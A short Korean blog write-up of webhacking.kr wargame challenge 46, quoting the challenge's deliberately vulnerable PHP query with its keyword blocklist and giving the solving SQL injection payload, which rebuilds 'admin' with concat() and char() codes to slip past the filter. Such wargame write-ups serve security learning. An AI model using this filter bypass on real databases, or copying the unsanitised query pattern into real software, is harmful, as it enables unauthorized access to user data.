티스토리 뷰

webhacking.kr 46번 문제 : sql 인젝션


 

49번과 화면은 똑같다.


소스를 보아하니


<?

$_GET
[lv]=str_replace(" ","",$_GET[lv]);
$_GET[lv]=str_replace("/","",$_GET[lv]);
$_GET[lv]=str_replace("*","",$_GET[lv]);
$_GET[lv]=str_replace("%","",$_GET[lv]);

if(
eregi("union",$_GET[lv])) exit();
if(
eregi("select",$_GET[lv])) exit();
if(
eregi("from",$_GET[lv])) exit();
if(
eregi("challenge",$_GET[lv])) exit();
if(
eregi("0x",$_GET[lv])) exit();
if(
eregi("limit",$_GET[lv])) exit();
if(
eregi("cash",$_GET[lv])) exit();

$q=@mysql_fetch_array(mysql_query("select id,cash from zmail_member where lv=$_GET[lv]"));

if(
$q && $_GET[lv])
{
echo(
"$q[0] information<br><br>money : $q[1]");

if(
$q[0]=="admin") @solve();

}



49번은 0x 를 이용하요 HEX값을 이용하였지만 여기는 안된다~~

49번과 거의 똑같은 문제라고 보면된다!


힌트는 concat함수! , char() 아스키코드

lv=4||id=concat(char(97),char(100),char(109),char(105),char(110))